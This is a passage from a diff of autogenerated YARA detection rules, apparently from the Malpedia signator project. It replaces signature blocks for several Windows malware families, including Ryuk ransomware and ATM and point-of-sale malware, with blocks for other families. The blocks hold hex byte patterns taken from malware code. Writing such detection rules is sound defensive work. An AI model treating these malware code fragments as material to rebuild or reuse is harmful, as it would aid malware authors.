-		$sequence_2 = { 8bf0 83c408 85f6 741b 56 6800700000 6a01 }
-		$sequence_3 = { c6440c0d75 c6440c0e6e 8d4c2408 51 683f000f00 50 52 }
-		$sequence_4 = { 85c0 7559 8b4c2408 51 ff15???????? 8d942410010000 6804010000 }
-		$sequence_5 = { 8b442418 68???????? 50 ff15???????? 85c0 7559 8b4c2408 }
-		$sequence_6 = { 7559 8b4c2408 51 ff15???????? 8d942410010000 }
-		$sequence_7 = { c6440c0e6e 8d4c2408 51 683f000f00 50 }
-		$sequence_8 = { 51 ff15???????? 8d942410010000 6804010000 }
-		$sequence_9 = { f7d1 49 c6440c0c52 c6440c0d75 c6440c0e6e 8d4c2408 }
+		$sequence_0 = { 50 ffd7 50 56 68???????? }
+		$sequence_1 = { ffd7 5e 32c0 5f c3 32c0 }
+		$sequence_2 = { ffd7 5e 32c0 5f }
+		$sequence_3 = { 50 57 6a00 6a16 ffb53cefffff ff15???????? 85c0 }
+		$sequence_4 = { 6a26 ffb53cefffff ff15???????? 85c0 750c ff15???????? 8986f8000000 }
+		$sequence_5 = { 740b 6a00 6a00 56 ff15???????? 57 8b3d???????? }
+		$sequence_6 = { 68c0270900 ffd7 6a00 ff35???????? }
+		$sequence_7 = { d1f8 33d2 50 51 8d4dd8 }
+		$sequence_8 = { ffd7 85c0 741a 8d85d0fdffff c785d0fdffff2c020000 50 }
+		$sequence_9 = { ff15???????? 8bf0 85f6 740b 6a00 6a00 56 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 352256
 }
-rule MALPEDIA_Win_Ryuk_Auto : FILE
+rule MALPEDIA_Win_Mutabaha_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "63f1751f-d521-53f6-9b97-173de48e208c"
+		id = "f534e66a-bdb8-5a1d-bf5c-73ff5eac186f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ryuk_auto.yar#L1-L403"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mutabaha_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "4db40c45399c6db29cb64a2d888825a95bd14e7ba242fbbfeb5e1735cc3c9e5b"
+		logic_hash = "4a43ad552d1d544452880d565c27a595efcac7dc1e5e985992d3dce7571f7838"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -109245,67 +109479,32 @@ rule MALPEDIA_Win_Ryuk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 6a01 6a00 6814010000 }
-		$sequence_1 = { ff15???????? 85c0 7508 6a01 ff15???????? 68???????? 6a01 }
-		$sequence_2 = { 6a08 6a18 68???????? 68???????? 68???????? ff15???????? 85c0 }
-		$sequence_3 = { 81b8????????50450000 754c b90b010000 66398818000035 }
-		$sequence_4 = { b90b010000 66398818000035 753e 8b4508 }
-		$sequence_5 = { ff15???????? 85c0 7407 b801000000 eb0b eb04 }
-		$sequence_6 = { e8???????? 68e8030000 ff15???????? 68???????? e8???????? }
-		$sequence_7 = { b801000000 eb0b eb04 33c0 eb05 b801000000 }
-		$sequence_8 = { c1e100 817c0dd8ff000000 0f8696000000 ba04000000 6bc200 }
-		$sequence_9 = { 99 89459c 8955a0 8b55a0 3b55f8 0f870b020000 }
-		$sequence_10 = { eb09 8b45f0 83c001 8945f0 8b45f0 99 8b4d08 }
-		$sequence_11 = { 50 8b4de8 0fb6512c 52 e8???????? }
-		$sequence_12 = { c1e200 8b45fc c6041000 c745d800000000 c745dc00000000 c745e000000000 }
-		$sequence_13 = { ff15???????? b811000000 e9???????? e9???????? }
-		$sequence_14 = { 6a00 6814010000 ff7508 ff35???????? ff15???????? }
-		$sequence_15 = { ff15???????? 833d????????00 6a10 6a18 }
-		$sequence_16 = { 7407 48 85c0 7ff0 }
-		$sequence_17 = { ff15???????? b803000000 eb05 b805000000 }
-		$sequence_18 = { 751b ff35???????? ff35???????? 6a01 68???????? e8???????? }
-		$sequence_19 = { 2bf0 33c0 66890473 83ffff }
-		$sequence_20 = { 56 ff15???????? 8bcb 8d5102 }
-		$sequence_21 = { eb0b 8bc1 99 f7fe }
-		$sequence_22 = { 7212 81f9d0070000 770a 85d2 }
-		$sequence_23 = { 85d2 7714 7212 81f9d0070000 }
-		$sequence_24 = { e8???????? 488bc3 4883c430 5b c3 48895c2408 48896c2410 }
-		$sequence_25 = { f3a4 8d7afe 668b4702 8d7f02 }
-		$sequence_26 = { 68???????? 53 d1fe e8???????? 83c408 8d5002 }
-		$sequence_27 = { 4883c428 c3 48895c2408 57 4883ec30 8364242000 b908000000 }
-		$sequence_28 = { 0f9fc0 5d c3 8bff 55 8bec 8b4508 }
-		$sequence_29 = { d1fa 2bca 33c0 6689444bfe e9???????? }
-		$sequence_30 = { 488b7c2408 498bc1 c3 4053 4883ec20 8bc1 498bd8 }
-		$sequence_31 = { 6685c0 75f5 8d7bfe 2bd6 8d5f02 668b4702 }
-		$sequence_32 = { 2bd6 8d5f02 668b4702 83c702 6685c0 75f4 }
-		$sequence_33 = { 6685c9 75f5 2bf2 68???????? 53 d1fe }
-		$sequence_34 = { 7510 488bcb ff15???????? b802000000 }
-		$sequence_35 = { 4533c0 c744242003000000 ba00000040 ff15???????? 488bd8 ff15???????? }
-		$sequence_36 = { 8bc1 2bc2 d1e8 03c2 c1e806 6bc05a }
-		$sequence_37 = { 7516 66837f0254 750f 66837f0641 7508 }
-		$sequence_38 = { 488bf8 4885c0 7410 ff15???????? }
-		$sequence_39 = { 48897c2430 488d4c2440 c744242802000000 4533c9 4533c0 c744242003000000 ba00000040 }
-		$sequence_40 = { 8b5c3050 ff15???????? 41b900300000 c744242040000000 }
-		$sequence_41 = { e8???????? 488bcf ff15???????? 8d4301 e9???????? }
-		$sequence_42 = { ff15???????? 66833f4e 7516 66837f0254 }
-		$sequence_43 = { 41b900300000 c744242040000000 448bc3 488bd6 }
-		$sequence_44 = { 84c0 746c e8???????? 488d0d63080000 e8???????? }
+		$sequence_0 = { 8b4610 c6040808 ff4610 8b4610 c6040100 e9???????? 8b4610 }
+		$sequence_1 = { eb18 2bf9 8d145501000000 2bc1 8bcb c1e905 2bd9 }
+		$sequence_2 = { 53 e8???????? 83c41c 85c0 0f8543050000 8b4320 8d55f0 }
+		$sequence_3 = { 68???????? ff15???????? 898530fdffff 85c0 0f8441010000 68???????? 8d8d6cfdffff }
+		$sequence_4 = { 56 8bf1 8d4de8 57 8bfa e8???????? 83781408 }
+		$sequence_5 = { 0fafce 3bc1 731b 8bf9 b900080000 2bce c1e905 }
+		$sequence_6 = { e8???????? c7465400000000 8bc6 8b4df4 64890d00000000 59 5e }
+		$sequence_7 = { c7856cfdffff07000000 66898558fdffff 8b8554fdffff c78568fdffff00000000 83f808 7213 40 }
+		$sequence_8 = { 8bf9 c745f82e000000 e8???????? 40 8bcf 50 8d45f8 }
+		$sequence_9 = { 8b8d40efffff 85c9 7414 8b11 8d851cefffff 3bc8 0f95c0 }
 
 	condition:
-		7 of them and filesize < 7450624
+		7 of them and filesize < 1220608
 }
-rule MALPEDIA_Win_Hdmr_Auto : FILE
+rule MALPEDIA_Win_Tabmsgsql_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7c2af72-912d-5503-a152-e44806d38df1"
+		id = "613cbea2-b3e6-59ad-af97-1c16f24a8ca2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hdmr"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hdmr_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tabmsgsql_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "ee139c0aa91276df8e246776ac0e0dc9525d3fadc5574673ef7224c9dd7d71ea"
+		logic_hash = "fea9841dfc3e899e511f6e59152b7eb3a1bf8ea0929e01fae7a33a41386cf162"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109319,32 +109518,32 @@ rule MALPEDIA_Win_Hdmr_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b06 8b9094000000 8bce ffd2 8b10 8bc8 }
-		$sequence_1 = { 337008 8955fc 33de 8b75f8 33fe 81e7ff00ff00 33780c }
-		$sequence_2 = { 2bf7 8bff 0fb719 0fb73c0e }
-		$sequence_3 = { 51 e8???????? 8bf0 89470c 8b450c 83c404 8bd6 }
-		$sequence_4 = { ffd7 83c614 ff4c240c 0f8562ffffff 33d2 68fe070000 52 }
-		$sequence_5 = { 0f84e1030000 6a00 6a00 6a00 }
-		$sequence_6 = { 7424 8b06 8b9094000000 8bce }
-		$sequence_7 = { 8d45cc 50 c745cce86b4100 e8???????? 8b7508 bf63736de0 393e }
-		$sequence_8 = { 56 8d3c8540d04100 e8???????? 83e01f 59 }
-		$sequence_9 = { 8bce ffd2 8b10 4f 57 8bc8 }
+		$sequence_0 = { e8???????? 83c404 ff15???????? 5e 33c0 5b 81c404d00700 }
+		$sequence_1 = { e9???????? 8b0d???????? 3bcb 0f8463feffff a1???????? 3bc3 0f8456feffff }
+		$sequence_2 = { 6a01 8bcb ff15???????? eb45 8b430c 83f81f 7704 }
+		$sequence_3 = { 83c9ff 33c0 8d951217fcff f2ae f7d1 2bf9 50 }
+		$sequence_4 = { 8b842430f50100 83c424 85c0 5f }
+		$sequence_5 = { 51 b9???????? 895dfc a2???????? e8???????? 3bc3 0f84d7000000 }
+		$sequence_6 = { f3a5 8bc8 33c0 83e103 f3a4 8bbc2438060000 83c9ff }
+		$sequence_7 = { 5b 83e103 b801000000 f3a4 }
+		$sequence_8 = { 3de8030000 a3???????? 7d0c c705????????e8030000 }
+		$sequence_9 = { 33c0 68???????? f2ae f7d1 2bf9 8d442434 8bd1 }
 
 	condition:
-		7 of them and filesize < 284672
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Spyder_Auto : FILE
+rule MALPEDIA_Win_Warlock_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3b0ab008-5fca-5304-bb77-2526da47aa2d"
+		id = "5e6c43cf-6cf3-5e2a-a16b-cb7d8e2e37a1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spyder_auto.yar#L1-L174"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.warlock"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.warlock_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "12d22cf7781abc3ab19a5f3d98a04aaf02d5caaba80e64280fab23edd5e8d3b7"
+		logic_hash = "39dc3d0e9802161f2f6843f6a22ec4febcc1ed616080a524da3e5c547a9f1dac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109358,38 +109557,32 @@ rule MALPEDIA_Win_Spyder_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d057a150000 488905???????? 488d0590200000 488905???????? 488d0576150000 488905???????? }
-		$sequence_1 = { 488bc8 ff15???????? 488d15385f0000 488bce 488905???????? ff15???????? }
-		$sequence_2 = { 4181f9000000c0 7532 4585d2 756e 488d4b04 4c8d05563e0000 }
-		$sequence_3 = { 4c8d05fc890000 498bd4 488bcd e8???????? 85c0 }
-		$sequence_4 = { 486bd258 488b04c1 488d4c1010 48ff25???????? 48895c2408 57 }
-		$sequence_5 = { 4c8bd8 488905???????? 4885c0 7422 488d15795e0000 488bce ff15???????? }
-		$sequence_6 = { 488d0d68a10000 e8???????? 488d1584a10000 488d0d75a10000 e8???????? 90 }
-		$sequence_7 = { 443bce 753c 4585d2 7537 488d4b04 4c8d05173e0000 418d5216 }
-		$sequence_8 = { 6803010000 f3ab 66ab aa 8d442414 50 }
-		$sequence_9 = { 8b4c2414 81e2ffff0000 25ffff0000 52 8b542416 }
-		$sequence_10 = { ff15???????? 5f 5e b801000000 5b 81c47c150000 c3 }
-		$sequence_11 = { 8bec 8b4508 ff348570370910 ff15???????? 5d }
-		$sequence_12 = { c1f805 8d3c85204b0910 8bc3 83e01f }
-		$sequence_13 = { 8944241a 66895c2410 668944241e ff15???????? 8b542418 8b442416 }
-		$sequence_14 = { f3ab 8b8c248c150000 8d942488010000 66ab aa 8d842490150000 }
-		$sequence_15 = { b918000000 33c0 8d7c2431 885c2430 }
+		$sequence_0 = { 8b95c0f6ffff f724ba 0385ccf6ffff 83d200 01841dc0f8ffff 8b9de0f6ffff 8b85bcf8ffff }
+		$sequence_1 = { 894c2420 c16c242008 331cc574e44900 0fb6c1 8b4c2410 0fb6c9 8b04c571e44900 }
+		$sequence_2 = { 03c2 8bd0 c1e81a 2b442448 81e2ffffff03 89542430 89542444 }
+		$sequence_3 = { c70000000000 c7400800000000 c9 c20400 56 8bf1 8b8e80000000 }
+		$sequence_4 = { 6a34 e8???????? 8945e8 59 85c0 740d 57 }
+		$sequence_5 = { 50 8d4de8 c745fc04000000 e8???????? eb0a 6a01 8d4de8 }
+		$sequence_6 = { 80fb35 7e82 33c0 84db 0f95c0 05feff0000 e9???????? }
+		$sequence_7 = { 8b94249c000000 81c2feffff07 03c2 8bd0 c1e81a 81e2ffffff03 2b442458 }
+		$sequence_8 = { 0f94c1 2500180000 2d00100000 f7d8 1bc0 40 f7c300800000 }
+		$sequence_9 = { 668b4306 663b45e4 7513 c6062d 8d7e01 8bcb 89bd70ffffff }
 
 	condition:
-		7 of them and filesize < 1458176
+		7 of them and filesize < 1395712
 }
-rule MALPEDIA_Win_Shapeshift_Auto : FILE
+rule MALPEDIA_Win_Ghole_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c0c5bb16-0064-5063-a167-3feadfc849ba"
+		id = "42011619-6775-5fd7-9f1a-e781b1936bb7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shapeshift_auto.yar#L1-L104"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ghole_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "d57d4efbadfe762b0a6b1ab41967b0e572158e599e0e6d6d29d5b7411ccf5a23"
+		logic_hash = "0d47b012ca3e41e041f7c9334a8bf5ea912b5069ddcb6bf59ee419c3c1cf9dc4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109403,17 +109596,19 @@ rule MALPEDIA_Win_Shapeshift_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 8985f4feffff 33db 6a05 ff15???????? 68???????? }
-		$sequence_1 = { 8d0d009c4100 ba1d000000 e8???????? 5a c3 8d542408 }
-		$sequence_2 = { 51 ff15???????? 8bf0 89b5ecfdffff }
-		$sequence_3 = { 6af6 ff15???????? 8b04bd38054200 834c0318ff 33c0 }
-		$sequence_4 = { 8bf0 e8???????? 83c404 8bf8 33c9 66660f1f840000000000 0fbf044d3cfa4100 }
-		$sequence_5 = { f30f5e85ccfdffff f30f5905???????? e8???????? 83bde8fdffff00 741f 3bc7 }
-		$sequence_6 = { e8???????? 85f6 8bf0 6a0c 7550 e8???????? }
-		$sequence_7 = { 8995e8fdffff 57 898df8fdffff 899df0fdffff c785ecfdffff00000000 0f86ef010000 }
+		$sequence_0 = { 48 89c7 e8???????? c745cc00000000 c745b800000000 eb14 c78540ffffffe9030000 }
+		$sequence_1 = { 8878e0 49 8be9 45 8be0 44 8bea }
+		$sequence_2 = { 89f8 f7d0 89d9 21c1 48 8b45d0 48 }
+		$sequence_3 = { 83ec30 48 897dd8 48 8975d0 48 8b45d0 }
+		$sequence_4 = { 7509 83bdecf6ffffff 7448 8b855cffffff 80cc01 89855cffffff }
+		$sequence_5 = { 48 8b4040 48 8945f0 48 8b45f0 48 }
+		$sequence_6 = { 8b5010 8b45f8 0345fc 89c0 48 01c2 48 }
+		$sequence_7 = { 8b4008 8b55e4 48 8b4de8 48 89ce 48 }
+		$sequence_8 = { 48 89c7 e8???????? 85c0 7515 8b55f8 48 }
+		$sequence_9 = { 48 8b1d???????? 48 8b55a0 48 8b45c0 48 }
 
 	condition:
-		7 of them and filesize < 303104
+		7 of them and filesize < 622592
 }
 rule MALPEDIA_Win_Acehash_Auto : FILE
 {
@@ -109454,18 +109649,18 @@ rule MALPEDIA_Win_Acehash_Auto : FILE
 	condition:
 		7 of them and filesize < 2318336
 }
-rule MALPEDIA_Win_Penco_Auto : FILE
+rule MALPEDIA_Win_Hopscotch_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6aee07a7-ef18-5814-98a9-4888b78c9e4c"
+		id = "e03bc4c7-2cba-5076-a6ca-4697985738a4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.penco_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hopscotch"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hopscotch_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "cbd5d55ae946f04f495d8f2278cd17d368565e9345c264d195e742a52381e75b"
+		logic_hash = "9400f209885075e787eb0bd6132b5f0672b265a98357e610aebd52f7df050985"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109479,32 +109674,32 @@ rule MALPEDIA_Win_Penco_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33349500d83400 8bcf c1e918 33348d28ec3400 8b4c2410 0fb6d1 33349500d43400 }
-		$sequence_1 = { 75f6 8b542410 52 ff15???????? 6800c00000 6a00 56 }
-		$sequence_2 = { 51 8d95ecf0ffff 52 8b85b0fdffff 8d8c05e0fdffff 51 }
-		$sequence_3 = { 6800300000 8b9548feffff 52 6a00 ff15???????? 8945e4 }
-		$sequence_4 = { ff15???????? 68???????? 8b4de4 51 ff15???????? 6a02 }
-		$sequence_5 = { 8d8c245c020000 51 03f0 8d142e 68???????? 52 e8???????? }
-		$sequence_6 = { 69c0c4020000 c784059c96ffff4d000000 e9???????? c7851c94ffff00000000 b901000000 85c9 0f8409090000 }
-		$sequence_7 = { 8b4508 56 8d34c5c0c23400 833e00 7513 50 e8???????? }
-		$sequence_8 = { 3bc6 740b 3dea000000 0f85d8000000 8b6c2410 3bee 0f84da000000 }
-		$sequence_9 = { 8b349528ec3400 8b542414 894c241c 8b4c2410 c1e910 0fb6f9 3334bd28e83400 }
+		$sequence_0 = { 8d0480 8d0480 c1e002 50 ffd7 }
+		$sequence_1 = { 55 ffd3 8bf0 85f6 0f8569ffffff 68???????? e8???????? }
+		$sequence_2 = { a1???????? 83c420 85c0 5f 5e 5b }
+		$sequence_3 = { 6800800000 8b0d???????? 8b5150 52 ffd6 53 }
+		$sequence_4 = { 85c0 5f 5e 5b 7414 }
+		$sequence_5 = { 83c724 3bf0 72d8 eb2a 8b942430020000 8b4c2410 }
+		$sequence_6 = { c3 81ec08020000 8d442400 56 8d4c2408 }
+		$sequence_7 = { 6a21 50 e8???????? 83c408 c78424a400000002000000 8db42428010000 }
+		$sequence_8 = { 833d????????01 750d 8b442404 50 e8???????? 83c404 }
+		$sequence_9 = { 8b3d???????? 83c408 8d442408 50 ffd7 }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 1143808
 }
-rule MALPEDIA_Win_Atmspitter_Auto : FILE
+rule MALPEDIA_Win_Catchamas_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6677a06d-f51d-5f9e-9075-cbbb34c35eda"
+		id = "8b847b40-e879-5e63-94f7-59f1fcf23399"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.atmspitter_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.catchamas_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "bc5ce97320d3edf2cd777ada69ace7755633451b31f436076d0e817156126e74"
+		logic_hash = "cfbaa74a75beb0fd45948dc9b52c0976cafb521d914a50e8e394b7e70fd341de"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109518,32 +109713,32 @@ rule MALPEDIA_Win_Atmspitter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c70009000000 e8???????? ebd1 8bc8 c1f905 8d3c8d60da4000 }
-		$sequence_1 = { 57 8bc2 c1f805 8b048560da4000 8bfa }
-		$sequence_2 = { c686c800000043 c6864b01000043 c7466850c44000 6a0d e8???????? 59 8365fc00 }
-		$sequence_3 = { ff15???????? 6a02 6a00 8bf8 6a00 57 }
-		$sequence_4 = { 7d0d 8a4c181c 888870c64000 40 }
-		$sequence_5 = { 50 68???????? e8???????? 83c408 68???????? e8???????? 8b4528 }
-		$sequence_6 = { 83f914 0f8798000000 0fb691b0854000 ff249588854000 }
-		$sequence_7 = { 0f8c260a0000 8d42e0 3c58 770f 0fbec2 0fbe8060914000 83e00f }
-		$sequence_8 = { 56 57 50 c745fc00000000 ffd3 }
-		$sequence_9 = { 53 8b1d???????? 56 57 50 c745fc00000000 }
+		$sequence_0 = { 84c9 75f1 833d????????ff 740c 8db42470100000 }
+		$sequence_1 = { 40 e8???????? 85db 7411 }
+		$sequence_2 = { 8bf1 897c2418 c644241c00 e8???????? 68???????? }
+		$sequence_3 = { 83d200 8955d0 7554 83f8ff }
+		$sequence_4 = { 6a14 81e300800000 ffd7 83e001 33c9 8bff baba000000 }
+		$sequence_5 = { ff15???????? 56 8be8 55 53 }
+		$sequence_6 = { 6a00 52 c745dc00000000 e8???????? 8b45dc 6a00 8d4de8 }
+		$sequence_7 = { 8b45e0 7409 e8???????? 8bfc eb32 83c9ff }
+		$sequence_8 = { 66894e14 5e 8b8c2404080000 33cc e8???????? }
+		$sequence_9 = { e8???????? 682000cc00 53 53 56 57 55 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Romeos_Auto : FILE
+rule MALPEDIA_Win_Racket_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "57e36ea9-25df-5535-9507-4e3e8861391a"
+		id = "f3a5d01f-f04e-5cab-9782-744a7bfd597c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.romeos_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.racket"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.racket_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "b103a70d5f0d023abb4fa14da56c910d4eba9e43552b97af05cf92b055758e46"
+		logic_hash = "60433cbd73972642cf68f927363d7c0cddb01db6fa6acbb68279911c92eddf9a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109557,32 +109752,32 @@ rule MALPEDIA_Win_Romeos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5e 5d 5b 81c438200000 c20400 5f 5e }
-		$sequence_1 = { 83c408 807c24480e 7406 43 83fb08 7cb6 e8???????? }
-		$sequence_2 = { 85c0 0f85ef000000 85db 751d 807c244802 0f85e0000000 }
-		$sequence_3 = { 50 bd30000000 e8???????? 8bbc2454200000 }
-		$sequence_4 = { 83c408 807c24480e 7406 43 }
-		$sequence_5 = { 7406 43 83fb08 7cb6 e8???????? 99 }
-		$sequence_6 = { 6a16 8d4c244c 6800200000 51 }
-		$sequence_7 = { 81c438200000 c20400 5f 5e }
-		$sequence_8 = { 8bf1 57 b9ff070000 33c0 8d7c2449 c644244800 6a16 }
-		$sequence_9 = { 0f850d010000 33db 6a16 8d4c244c 6800200000 }
+		$sequence_0 = { 837e2400 750a c6460c00 8b35???????? 68???????? 57 ffd3 }
+		$sequence_1 = { c1e803 2401 837b0400 884303 751b 6a00 6a00 }
+		$sequence_2 = { 6a00 c706???????? 897e08 6a00 c7460c00000000 c7461000000000 6861080000 }
+		$sequence_3 = { 8945f0 56 50 8d45f4 64a300000000 8b4510 85c0 }
+		$sequence_4 = { 8987e4fdffff 8b86e0fdffff 8987e8fdffff 8b86e4fdffff 8987ecfdffff 8b86e8fdffff 8987f0fdffff }
+		$sequence_5 = { 57 53 56 8d4a1c e8???????? 5f 5b }
+		$sequence_6 = { 895dd0 8b7508 33ff 897dcc 8975bc 3b750c 0f8ddd070000 }
+		$sequence_7 = { 894dfc 394db8 0f8c37050000 8b5514 be01000000 2bd0 894df4 }
+		$sequence_8 = { f7c700000002 7446 8b0a 3b4a04 752a 837a1000 7517 }
+		$sequence_9 = { ffb548ffffff 0f57c0 c745ac00000000 8d4da4 660fd645a4 e8???????? }
 
 	condition:
-		7 of them and filesize < 294912
+		7 of them and filesize < 985088
 }
-rule MALPEDIA_Win_Pathloader_Auto : FILE
+rule MALPEDIA_Win_Brutpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6e986434-599f-5205-bbd3-c4644fef6a44"
+		id = "bb6abccd-59b3-5a30-9e67-ccbe498737a5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pathloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pathloader_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.brutpos_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "7556d740969ba30806ff23ef7c71f55747c108deea39b5487e7d46d63a258306"
+		logic_hash = "89d0bc6a7e52ba9f63dface96ebbf483b03be0cbf8144ed32f3b88bf360b4eda"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109596,32 +109791,32 @@ rule MALPEDIA_Win_Pathloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7742 498bc8 e8???????? 4c897710 48c747180f000000 }
-		$sequence_1 = { 41ffd0 498986d8000000 488d55c8 48837de008 480f4355c8 4533c9 450fb786a0000000 }
-		$sequence_2 = { 7524 488d0d5e940200 e8???????? 85c0 7510 488d0d66940200 e8???????? }
-		$sequence_3 = { 488d15ea240100 e8???????? 8bcb 4885c0 740c }
-		$sequence_4 = { 0fb705???????? 6689442460 0fb605???????? 88442462 448bc1 4183ff02 }
-		$sequence_5 = { 4c63d2 488bd9 498bc2 458bf1 48c1f806 488d0dc0a20100 }
-		$sequence_6 = { 57 4883ec20 e8???????? 488b05???????? 488d1d2ffe0100 4885c0 480f45d8 }
-		$sequence_7 = { 488bfa 488bd9 49894ba8 498953b0 4533f6 45897398 }
-		$sequence_8 = { 410fb641ff 440f47c2 4533c2 4569d093010001 84c0 75d7 4181fad26d58ad }
-		$sequence_9 = { e8???????? 84c0 0f8422ffffff 44383d???????? f20f1005???????? 0fb705???????? }
+		$sequence_0 = { 59 58 83c004 83e904 8808 }
+		$sequence_1 = { 03c2 034508 2938 83e902 75e8 ebd9 5e }
+		$sequence_2 = { 8d5b18 8b5b60 03d8 52 8b35???????? }
+		$sequence_3 = { 6681f9df77 7412 0f31 8bd8 }
